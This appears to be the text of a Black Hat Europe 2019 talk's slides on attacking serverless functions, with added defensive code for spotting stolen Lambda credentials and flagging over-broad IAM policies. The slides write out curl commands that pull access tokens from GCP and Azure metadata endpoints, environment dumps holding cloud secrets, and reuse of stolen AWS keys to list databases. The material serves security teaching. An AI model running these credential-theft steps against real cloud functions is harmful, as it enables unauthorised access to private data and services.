Eu 19 Melamed Alexa Hack My Server Less Please PDF

The document discusses gaining unauthorized access to resources in serverless computing environments through poor coding practices and misconfigurations. It provides examples of exploiting credentials and permissions exposed by functions to reach internal services, external APIs, and sensitive data, and shows how permissions can be restricted to the bucket level instead of granted broadly in order to mitigate these risks.

Tal Melamed

@4ppsec

Head of Security Research

Alexa,
Hack My Server(less) Please
4ppsec

@4ppsec

talmelamed

[email protected]

appsec.it
Alexa, The Hacking Assistant
[email protected]
Disclaimer

The exploits discussed in this talk are not the result of vulnerabilities in the cloud infrastructure (i.e. the serverless platforms themselves). Rather, they take advantage of poor coding and misconfigurations at the application level.

Housekeeping
Base Camp
Interesting Stuff
Related Work
Q&A
Why Serverless?

Serverless Market Share
The Evolution of Cloud Computing

Shared Responsibility in the Cloud

Event-Driven Architecture

Your code.

Your mistakes...

[Diagram: an attack vector passing through a misconfigured firewall and the security controls into the internal network and its sensitive data]
Serverless runtime characteristics (AWS Lambda / Google Cloud Functions / Azure Functions):

Single Purpose Container
Ephemeral
Read Only: except from /tmp (on Azure Functions, except from /tmp and /home)

Triggers:
  AWS Lambda (23+): http (apigw), email, code, dynamodb, sns, sqs, s3, mqtt, alexa, log, auth, 3rd-party, ...
  Google Cloud Functions (12+): http, pub/sub, firestore, Firebase x4 (config, db, auth, analytics), storage
  Azure Functions (8): http, blob, cosmosdb, timer, event grid/hub, queue, iot, sendgrid, ...

Source Code:
  AWS Lambda: /var/task
  Google Cloud Functions: /user_code/
  Azure Functions: /home/site/wwwroot (for http)
  In all cases the running function's code directory is also reachable as /proc/{id}/cwd

Sum it up

Gaining Access to Resources

curl 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' -H 'Metadata-Flavor: Google'

{"access_token":"ya29.c.KqUBsdenNSGhEgLBLJJaA9QF2lIYxREMjPTe-1RcGSjLCIA0l4bXZdzTWw7J1F69oEg2DiwAxD_LO6NZcGoCaPn0UEO5ODzdGdTNPn_kyKicduMZyrWCZ2S_g8eVdxY4wx7SPerLoueoTuA79xi2sutqa186EPVJKBXeK1FwIirQ7Qfo2hZ-FyniQKD-_ICtRYhZ7VZrpaFBbXuFbG-RjA4pdNLfpaTV","expires_in":1054,"token_type":"Bearer"}

curl https://storage.googleapis.com/storage/v1/b?project=bh19eu -H "Authorization: Bearer ya29.c.KqUBsdenNSGhEgLBLJJaA9QF2lIYxREMjPTe-1RcGSjLCIA0l4bXZdzTWw7J1F69oEg2DiwAxD_LO6NZcGoCaPn0UEO5ODzdGdTNPn_kyKicduMZyrWCZ2S_g8eVdxY4wx7SPerLoueoTuA79xi2sutqa186EPVJKBXeK1FwIirQ7Qfo2hZ-FyniQKD-_ICtRYhZ7VZrpaFBbXuFbG-RjA4pdNLfpaTV" | jq

Sum it up

Gaining Access to Resources

env

AWS_SESSION_TOKEN=IQoJb3JpZ2l2VjEC0aCXV…qLJc5uP/vmucPb2/J9SX05U=
AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/test-env
LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib
AWS_EXECUTION_ENV=AWS_Lambda_python3.8
AWS_LAMBDA_FUNCTION_NAME=test-env
PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
AWS_DEFAULT_REGION=us-east-1
PWD=/var/task
AWS_SECRET_ACCESS_KEY=B2A++2GxZbX9oC7l123123123SUCyJCpq123123123
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=ASIAYO3RCHM123123123
_HANDLER=lambda_function.lambda_handler
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128

$ AWS_SESSION_TOKEN=IQoJb3JpZ2l2VjEC0aCXV…qLJc5uP/vmucPb2/J9SX05U= AWS_SECRET_ACCESS_KEY=B2A++2GxZbX9oC7l123123123SUCyJCpq123123123 AWS_ACCESS_KEY_ID=ASIAYO3RCHM123123123 aws dynamodb list-tables

{
  "TableNames": [
    "DVSA-INVENTORY-DB",
    "DVSA-ORDERS-DB",
    "DVSA-USERS-DB",
    "demo_security_events",
    "slacker-slack-messages",
    "test-table-tmp"
  ]
}
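A defender-side check for the credential theft shown above, added here as an example and not part of the talk: the temporary keys from the function's environment belong to a role session named after the function, and calls the runtime itself makes carry botocore's exec-env/AWS_Lambda_python3.8 user-agent fragment (the AWS_EXECUTION_ENV value). CloudTrail records that use that session without a Lambda exec-env are a signal that the keys left the function. The role name, account id and the records themselves are constructed; the user agent is attacker-controlled, so this is a detection signal, not proof.

```python
import json

# Role session as CloudTrail records it for calls made with the function's
# credentials. Role name and account id are assumptions; "test-env" is the
# function name from the env dump above.
FUNCTION_NAME = "test-env"
ROLE_SESSION_SUFFIX = f"assumed-role/test-env-role/{FUNCTION_NAME}"
# botocore appends exec-env/<AWS_EXECUTION_ENV> to the user agent inside Lambda.
LAMBDA_EXEC_ENV = "exec-env/AWS_Lambda_"


def is_stolen_credential_use(record):
    """True when the function's role session is used without a Lambda runtime user agent."""
    identity = record.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return False
    if not identity.get("arn", "").endswith(ROLE_SESSION_SUFFIX):
        return False
    # A forged user agent would evade this; treat hits as leads to triage.
    return LAMBDA_EXEC_ENV not in record.get("userAgent", "")


def find_credential_misuse(records):
    """Return (eventName, sourceIPAddress) for every suspicious record."""
    return [(r["eventName"], r.get("sourceIPAddress", "?"))
            for r in records if is_stolen_credential_use(r)]


# Constructed sample records: one call from inside the function, one replay of
# the same session with the AWS CLI from elsewhere, one unrelated IAM user.
SAMPLE_RECORDS = json.loads("""[
 {"eventName": "GetObject",
  "userIdentity": {"type": "AssumedRole",
                   "arn": "arn:aws:sts::123456789012:assumed-role/test-env-role/test-env"},
  "userAgent": "Boto3/1.10.0 Python/3.8.0 Linux/4.14.0 exec-env/AWS_Lambda_python3.8 Botocore/1.13.0",
  "sourceIPAddress": "198.51.100.7"},
 {"eventName": "ListTables",
  "userIdentity": {"type": "AssumedRole",
                   "arn": "arn:aws:sts::123456789012:assumed-role/test-env-role/test-env"},
  "userAgent": "aws-cli/1.16.0 Python/3.7.0 Darwin/18.0 botocore/1.13.0",
  "sourceIPAddress": "203.0.113.10"},
 {"eventName": "ListTables",
  "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/admin"},
  "userAgent": "aws-cli/1.16.0 Python/3.7.0 Darwin/18.0 botocore/1.13.0",
  "sourceIPAddress": "203.0.113.10"}
]""")

if __name__ == "__main__":
    for event, ip in find_credential_misuse(SAMPLE_RECORDS):
        print(f"role session of {FUNCTION_NAME} used outside Lambda: {event} from {ip}")
```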

Sum it up

Gaining Access to Resources

env

WEBSITE_CORS_SUPPORT_CREDENTIALS=False
HOME=/home
APPSETTING_AzureWebJobsStorage=DefaultEndpointsProtocol=https;AccountName=storageaccounttestbdb3;AccountKey=OfBOA...7EU/r2tQ==
WEBSITE_HOSTNAME=bheu19.azurewebsites.net
WEBSITE_AUTH_ENCRYPTION_KEY=17F259...1D151C8EEAB55D3E860B49C7C73A39A2DFFF
AzureWebJobsScriptRoot=/home/site/wwwroot
MACHINEKEY_DecryptionKey=17F259...1D151A0E8C8EAB55D3E860B49C7C73A39A2DFFF
MSI_ENDPOINT=http://172.16.0.6:8081/msi/token
MSI_SECRET=fc2f077b-1d28-4e2e-bf26-61d8fa241deb
WEBSITE_CORS_ALLOWED_ORIGINS=https://functions.azure.com,https://functions-staging.azure.com,https://functions-next.azure.com
PWD=/home/site/wwwroot
SSH_PORT=2222
WEBSITE_AUTH_SIGNING_KEY=801506D5B06D9...55816144E733C239C2E1B654F875601

curl http://172.16.0.6:8081/msi/token -H "Secret: fc2f077b-1d28-4e2e-bf26-61d8fa241deb"

{
  "access_token": "eyJXaGF0IGFyy/Bmb3IIj...bm90IGEgtlbiJ9",
  "expires_on": "11/14/2019 02:12:42 PM +10:00",
  "resource": "https://bh19-app-vault.vault.azure.net",
  "token_type": "Bearer"
}

curl -X GET -H "Authorization: Bearer $token" -H "Content-Type: application/json" https://management.azure.com/subscriptions/{subscriptionId}?api-version=2019-06-01 | jq

{
  "environmentName": "AzureCloud",
  "id": "12365123-6123-4123-8123-0612312393ab",
  "name": "Azure subscription",
  "tenantId": "ab123123-1231-1231-8123-c123123123cd",
  "user": {
    "name": "[email protected]",
    "type": "user"
  }
}
import logging
import boto3
from botocore.exceptions import ClientError


def get_object_from_event(event):
    """Fetch the S3 object named in an S3 event notification record."""
    s3 = boto3.client('s3')
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = event['Records'][0]['s3']['object']['key']
    try:
        response = s3.get_object(Bucket=bucket, Key=key)
    except ClientError as e:
        logging.error(e)
        return None
    # Return an open StreamingBody object
    return response['Body']

Three IAM policies for the function above, from broadest to least privilege:

1. Any S3 action on any bucket:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:*"],
    "Resource": ["arn:aws:s3:::*"]
  }]
}

2. Any S3 action, restricted to one bucket:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:*"],
    "Resource": ["arn:aws:s3:::myBucket/*"]
  }]
}

3. Only the action the function actually needs, on one bucket:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:GetObject"],
    "Resource": ["arn:aws:s3:::myBucket/*"]
  }]
}
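To make the difference between the three policies mechanical, here is an added checker (not from the talk) that flags wildcard actions and wildcard resources in Allow statements and runs over the three policies as shown; the handler only calls get_object, so only the third policy passes.

```python
import json

# The three policies from the slide, in the order shown: wildcard action on
# every bucket, wildcard action on one bucket, one action on one bucket.
POLICIES = {
    "all-buckets": json.loads('{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", '
                              '"Action": ["s3:*"], "Resource": ["arn:aws:s3:::*"]}]}'),
    "one-bucket": json.loads('{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", '
                             '"Action": ["s3:*"], "Resource": ["arn:aws:s3:::myBucket/*"]}]}'),
    "one-bucket-read": json.loads('{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", '
                                  '"Action": ["s3:GetObject"], "Resource": ["arn:aws:s3:::myBucket/*"]}]}'),
}


def _as_list(value):
    # IAM accepts either a single string or a list for Statement, Action and Resource.
    return value if isinstance(value, list) else [value]


def policy_findings(policy):
    """Return one finding string per over-broad grant in the policy's Allow statements."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(f"statement {i}: NotAction/NotResource grants by exclusion")
        for action in _as_list(stmt.get("Action", [])):
            # "*" or "service:*" allows every API of the service, including writes and deletes.
            if action == "*" or action.endswith(":*"):
                findings.append(f"statement {i}: wildcard action {action}")
        for resource in _as_list(stmt.get("Resource", [])):
            # arn:aws:s3:::* covers every bucket; arn:aws:s3:::bucket/* stays inside one bucket.
            if resource == "*" or resource.endswith(":::*"):
                findings.append(f"statement {i}: wildcard resource {resource}")
    return findings


if __name__ == "__main__":
    for name, policy in POLICIES.items():
        print(name, policy_findings(policy) or ["least privilege: ok"])
```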

Disclaimer

It's not them. It's you!

REST API / 3rd Party App (Slack)

Cloud Storage

Email

Alexa, please hack my server(less)

New Attack Vectors

REST API
3rd-party App
Cloud Storage (e.g. file)
Authentication process
Logs
Email
Pub/Sub notification
IoT (e.g. voice-command, mqtt)
Code commit
Data Analytics
Related Projects

Black Hat Sound Bytes

● Loss of perimeter → Ambiguous attack vectors

● Follow the Least-Privilege Principle

● Automate, automate, automate!

● Serverless might be the most secure environment for your application

Thank you! | Q&A

Alexa, Hack My Server(less) Please
